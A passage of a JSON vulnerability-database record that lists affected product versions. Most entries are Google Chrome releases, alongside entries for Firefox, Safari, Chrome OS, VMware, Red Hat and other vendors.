        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.620.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.568.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.735.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.487.0"
      },
      {
        "model": "workstation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.129"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.9"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.590.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.113"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.23"
      },
      {
        "model": "carrier routing system 6.6.0.base",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.332.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.953.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.666.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1071.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1013.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.73"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.113"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.340.0"
      },
      {
        "model": "facsaria fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.373.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.0"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.353.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.43"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.470.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.461.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "22.04917"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.446.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.5"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.1"
      },
      {
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.357.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.459.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.541.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.221"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.333.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.779.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.307"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.127"
      },
      {
        "model": "chrome beta mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1027"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.396.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.428.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1035.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "23.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.460.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.14"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.9"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.87"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "34.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "5.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1053"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.455.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1014.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "21.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.220"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.210"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.449.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.142"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.497.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.576.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1015.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.795.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.213"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.2"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.12"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.148"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.18"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.99"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.751.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.636.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.313"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.64"
      },
      {
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.456.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.12"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.47"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.831.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.38"
      },
      {
        "model": "innova",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.111"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.550.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.583.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.595.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1009"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.108"
      },
      {
        "model": "proliant dl385 gen10 server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.02"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.866.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.34"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.131"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.128"
      },
      {
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.653.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1656.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
